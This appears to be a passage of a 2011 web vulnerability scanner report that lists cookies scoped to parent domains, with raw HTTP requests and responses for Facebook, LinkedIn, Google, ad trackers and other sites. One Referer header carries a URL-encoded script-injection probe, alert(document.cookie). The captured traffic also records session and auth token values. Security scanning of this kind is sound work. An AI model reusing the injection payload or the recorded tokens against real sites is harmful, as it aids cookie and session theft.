bkc=KJh566N/PaWDOded7uX5jySnVExVAh9b4AODvaCJmD1nStnbQYQBbRBuSYWp+uAocDaW/++D6YTvLCSYOubvoko1n+GaQHO1Z0eYx1vBsDx48Xhf2NlwlqpcMdzd2f8fpftk1n9y9ixSer5XYvaW4Z58/s9XPQLWVhDSgtE/MVlL8lA/pN7ZKrlp0Fc4Pp+p9Hxvf9KlMYrDdl9jYv2kzdxJfw58SSfU4AndNp/vBYNkzlbG3rImuBIhpwUS20J93aSCzXAjMfN2aTx8gNtrzlpNAdcIicu6qOyZjXSkn68/FfNFdYJ/fQ5Zghd04Yxip4BgFbqb91NUrVRX+DtSX2GXcfI7WgNPpfg44X4qzAcWh275A2npXXSePeupAUgVKbOSpl8LZz4En+wMtVjQXARwf4K4KFSzjz8gqT6O4z6vnT+oX+1b27/vyopUFA6Il3ZxGF1PhuSyC83kmSX2UKBTk5qMyTXnfJTp6Z7n0PcMsKgaUMGFdffF3bbwF5L0Mb2BtTzXIKLbUf/XRJZt6d1x2UFhawehXhfwijQ6NtFcG7uUBiQLanLXgTVAmS22Qr8EIp9ywsqzSo7pti45dpl3rrMmUd9q7fUX3XITlIdAufTrboIFbGZA211mbDKVEbKD8hUldcfhmKmpM6VAdSFu6pUvzflqgXGbjprAFdtDMZ2H7rsKgXW5fjTpBbDUZ8EyZ8H6xT+65NgbGmUAmKwdAK9Ydx==; bkdc=res
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 21:59:56 GMT P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml" Expires: Fri, 04 Feb 2011 21:59:56 GMT Cache-Control: max-age=86400, private Set-Cookie: bk=gsKMbtVZbt/sHNJo; expires=Tue, 02-Aug-2011 21:59:56 GMT; path=/; domain=.bluekai.com Set-Cookie: bkc=...[SNIP]...; expires=Tue, 02-Aug-2011 21:59:56 GMT; path=/; domain=.bluekai.com Set-Cookie: bkdc=res; expires=Fri, 04-Feb-2011 21:59:56 GMT; path=/; domain=.bluekai.com BK-Server: 1c6d Content-Length: 62 Content-Type: image/gif Connection: keep-alive
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: translate.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 20:32:56 GMT Expires: Thu, 03 Feb 2011 20:32:56 GMT Cache-Control: private, max-age=86400 Content-Type: text/html; charset=UTF-8 Content-Language: en Set-Cookie: PREF=ID=705d98a7bc0e380c:TM=1296765176:LM=1296765176:S=sHB4e3nekqE-YD1z; expires=Sat, 02-Feb-2013 20:32:56 GMT; path=/; domain=.google.com X-Content-Type-Options: nosniff Server: translation X-XSS-Protection: 1; mode=block Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /Tracking/V3/Instream/Impression/?0|1574|42244|30521|5745|14160|HEADER|868|2293|413|BBEEND|&internalRedirect=true&cb=%timestamp%&ss_rand=98204660 HTTP/1.1 Host: trk.vindicosuite.com Proxy-Connection: keep-alive Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc_vpp={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pixel/?aid=148&tax=home HTTP/1.1 Host: uat.netmng.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: evo5=kvrgygjr7baud%7C5SyprRh6TrnFV2ndAy2HxCPgLLX3cZ%2FVfx%2FM0biott%2BcqVbJj5aCj55h7IXdjMgE9ed9rfydUW6gLxzZ4Z8iZfTCEnvI5PEwDP8UgnDwsNwf1a3vDJnVlaVWQNH%2F7d2VqxBrm0%2Fc%2FidZYflVD0ff%2F1E5rmifbqDgfH2Gt1zhs%2F2MnA08vEEPGokDm1Bn1W68QLHQ%2FzChSJMJNtyVsrnHyb3E37wmvDfW6FFUnXFOPDqGRb7GXzLEZaSRaSPR19puBUpHlUpXwBEY7g3LfZ4F7q%2FoPuX4s88d6II7AqTrPBQvVC3dTHYL6Y342A5GTpvcniShvZas%2BmBrU%2Fz%2FqdmcKtLQoSpK8%2F1EMObPX4EqA7WzFB9kMN0WKt0l5SlxdqQCviV0iLESOVRgETizb2Os%2Fh1P9v%2FlebIMxnWdfb6%2Byln%2FJfmz2fudQYM%2FGfUhPWgueSqcoFf5wfZykby2hBxGOg%3D%3D
Response
HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 19:03:59 GMT Server: Apache/2.2.9 P3P: policyref="http://uat.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV" Expires: Tue, 01 Feb 2011 19:03:59 GMT Last-Modified: Tue, 01 Feb 2011 19:03:59 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: evo5=kvrgygjr7baud%7CslbpB2OTqHJebVm%2BWLYhLSxmpA%2Bk0H4X%2BmBxXDdVODzOuKT2fiN3y3Y5%2FY%2FsvrMTk5MmDBp7hV7I6KwNAhVYdGvfRM%2Bt5tHVREa3RQX0svzHDl1LVEJkUgauiKULoRLwV%2Bz9EfZ7EbNR6AyPAOiKR2YDLplc5ZP%2FSQ6vGBOIIKPOPjcxxchwc%2Bo4nA5%2BXAHnXvznrsmn%2BcXyzWJFyo%2F7gsKfwS18nNxmub3nTC7jXt6PqmgrUCGB0%2B0vqAMDbEWNWkKk8aNor%2FvzClvR9YGDE1DDjaV8XMfY5k93PKcy7%2BcHAUsxt54LRmbEVOmofd1fIHKn0lsrW9GvKMll8AI8rXfZqe1UwR5PeLBmj4zS2RGDv2trchNe4um3wRa%2BvF6pKy4VT%2BDhUwGQ4LAm8Yog8lNAItduejTtfC9gbzyZMGm7yKAmWVLRZLZBSm7SpNBnA4SM6uA0wtdfTynqTvb5Hw%3D%3D; expires=Fri, 05-Aug-2011 19:03:59 GMT; path=/; domain=.netmng.com Location: http://ad.yieldmanager.com/pixel?id=582755&id=584778&id=584789&t=2 Content-Length: 1 Connection: close Content-Type: text/html; charset=UTF-8
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: video.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Date: Thu, 03 Feb 2011 20:33:04 GMT Expires: Thu, 03 Feb 2011 20:33:04 GMT Cache-Control: private, max-age=0 Set-Cookie: PREF=ID=1be32f5d81ed4b3b:TM=1296765184:LM=1296765184:S=XUl03TgBOSGxaiOV; expires=Sat, 02-Feb-2013 20:33:04 GMT; path=/; domain=.google.com X-Content-Type-Options: nosniff Server: VSFE_1.0 X-XSS-Protection: 1; mode=block Connection: close
<!doctype html> <meta content="text/html; charset=UTF-8" http-equiv=content-type> <meta content="Search millions of videos from across the web." name=description> <title>Google Videos</title> <script> ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/o?id=cD5Q7abi8r4inHadbi-bnq&i=http%3A%2F%2Fa.collective-media.net%2Fadi%2Flb.buzzillions%2F%3Bpos%3Datf%3Btile%3D1%3Bdcopt%3Dist%3Bsz%3D728x90%3Bord%3D1296770389%3F&ts=1296770455256 HTTP/1.1 Host: w.ic.tynt.com Proxy-Connection: keep-alive Referer: http://www.buzzillions.com/reviews/59ab9%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4e54375ce26/x22 Cache-Control: max-age=0 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /comment-iframe.g?blogID=722867207364741287&postID=3730301442720466539&blogspotRpcToken=6110411 HTTP/1.1 Host: www.blogger.com Proxy-Connection: keep-alive Referer: http://www.cloudscan.me/2011/01/abstract-white-paper-relative.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PREF=ID=9268244d0e3d1ace:TM=1294785636:LM=1294785636:S=mgdFOGdwXJw4zKJI; blogger_TID=216bd5db56d4b0a7
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html dir="ltr"><head><title>Blogger: Penetration Testing | Hoyt LLC - Post a Comment</title> <link href="http ...[SNIP]...
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
lsd=Al9E9; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=Al9E9; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Thu, 03 Feb 2011 21:49:20 GMT Content-Length: 30803
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
lsd=xRgPt; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /2008/fbml HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 404 Not Found Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=xRgPt; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Thu, 03 Feb 2011 21:49:29 GMT Content-Length: 11422
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /campaign/landing.php HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 302 Found Location: http://www.facebook.com/ P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: campaign_click_url=%2Fcampaign%2Flanding.php; expires=Sat, 05-Mar-2011 21:49:22 GMT; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Thu, 03 Feb 2011 21:49:22 GMT Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home.php HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 302 Found Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Location: http://www.facebook.com/login.php P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=wLXVp; path=/; domain=.facebook.com Set-Cookie: next=http%3A%2F%2Fwww.facebook.com%2Fhome.php; path=/; domain=.facebook.com; httponly Set-Cookie: next_path=%2Fhome.php; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Thu, 03 Feb 2011 21:49:25 GMT Content-Length: 0
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
lsd=FMAWt; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pages/Veoh/129836657035793 HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 301 Moved Permanently Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Location: http://www.facebook.com/VeohTV P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=FMAWt; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Thu, 03 Feb 2011 21:49:29 GMT Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /share.php HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: datr=y_9KTbq--wiemAhPZf9cZRCm; expires=Sat, 02-Feb-2013 19:19:39 GMT; path=/; domain=.facebook.com; httponly Set-Cookie: lsd=yNjLf; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fshare.php; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fshare.php; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Thu, 03 Feb 2011 19:19:39 GMT Content-Length: 10796
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /supermediacom HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: datr=yP9KTbiv931zl65aXpcqa4m-; expires=Sat, 02-Feb-2013 19:19:36 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=bxxex; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Thu, 03 Feb 2011 19:19:37 GMT
Content-Length: 146681
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /search/ HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:30 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: BX=4kc870h6km8na&b=3&s=0v; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.flickr.com
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Sun, 02-Feb-2014 21:49:30 GMT; path=/; domain=.flickr.com
Set-Cookie: cookie_l10n=deleted; expires=Wed, 03-Feb-2010 21:49:29 GMT; path=/; domain=flickr.com
Set-Cookie: cookie_intl=deleted; expires=Wed, 03-Feb-2010 21:49:29 GMT; path=/; domain=flickr.com
Set-Cookie: search_z=t; expires=Wed, 30-Oct-2013 21:49:30 GMT; path=/; domain=.flickr.com
X-Served-By: www87.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23029
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /wholesale-Shower-Faucets_c2863 HTTP/1.1
Host: www.lightinthebox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /wholesale/golf-clubs.html HTTP/1.1
Host: www.linkchina.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /in/troyd/x22 HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: bcookie="v=1&0cafcf8d-e068-4822-b520-7439b567b823"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Tue, 21-Feb-2079 23:39:36 GMT; Path=/
Last-Modified: Thu, 27 Jan 2011 18:58:16 GMT
If-Modified-Since: Thu, 27 Jan 2011 18:58:16 GMT
Set-Cookie: lang="v=2&lang=en"; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Thu, 03 Feb 2011 20:25:29 GMT
X-Cache: MISS from www.linkedin.com
X-Cache-Lookup: MISS from www.linkedin.com:8080
Via: 1.0 www.linkedin.com (squid/3.0.STABLE20)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> < ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pub/troy-brown/07/287/56A/x22 HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID="ajax:6393265550819748814"; Version=1; Path=/
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Set-Cookie: leo_auth_token="GST:8umv_nS7XFzUyxeKwcm4-54LG5Af_dxZBECJyfS9zSz2oe7lnSRZnR:1296764778:7cadffe11cc6d886b438c64892ac7c2f8d826bc7"; Version=1; Max-Age=1799; Expires=Thu, 03-Feb-2011 20:56:17 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: visit=G; Expires=Tue, 21-Feb-2079 23:40:25 GMT; Path=/
Set-Cookie: bcookie="v=1&b190bc23-5ec6-4de1-a9c4-5a80edfac251"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Tue, 21-Feb-2079 23:40:25 GMT; Path=/
Set-Cookie: lang="v=2&lang=en"; Version=1; Domain=linkedin.com; Path=/
Location: http://www.linkedin.com/pub/troy-brown/7/287/56a
Content-Language: en-US
Content-Length: 0
Date: Thu, 03 Feb 2011 20:26:18 GMT
X-Cache: MISS from www.linkedin.com
X-Cache-Lookup: MISS from www.linkedin.com:8080
Via: 1.0 www.linkedin.com (squid/3.0.STABLE20)
Connection: keep-alive
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /shareArticle HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Expires: 0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, max-age=0
Set-Cookie: leo_auth_token="GST:ZvpYDWFtWOPUWYjh_jHyedipSluAqpcn6vhruIXa2CDdWVdPpP66g5:1296760855:7d27a506e0853359e3965f871f95b1bfef8c45d6"; Version=1; Max-Age=1799; Expires=Thu, 03-Feb-2011 19:50:54 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: JSESSIONID="ajax:0561599565067721010"; Version=1; Path=/
Set-Cookie: visit=G; Expires=Tue, 21-Feb-2079 22:35:02 GMT; Path=/
Set-Cookie: bcookie="v=1&695a9322-0059-4252-9172-662df4a2e00f"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Tue, 21-Feb-2079 22:35:02 GMT; Path=/
Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 7453
Date: Thu, 03 Feb 2011 19:20:54 GMT
Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19965045525d5f4f58455e445a4a42198c;expires=Thu, 03-Feb-2011 19:51:08 GMT;path=/;httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1
Host: www.made-in-china.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /buzz/members/smartdesis/x22 HTTP/1.1
Host: www.mybloglog.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:28:24 GMT
Set-Cookie: BX=9fhlkdh6km3v8&b=3&s=1o; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.mybloglog.com
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Cache-Control: private
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 7249
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title>Page Not Found - MyBlogLog</title> <meta http-equiv="Cont ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1
Host: www.switchboard.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
veohCookie="VisitorUID=C5282E33-9CD2-D729-6A94-BEC4BD8BA173&LastUpdate=03/Feb/2011:12:30:38 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:38 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Set-Cookie: veohCookie="VisitorUID=C5282E33-9CD2-D729-6A94-BEC4BD8BA173&LastUpdate=03/Feb/2011:12:30:38 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:38 GMT; Path=/
Date: Thu, 03 Feb 2011 20:30:39 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
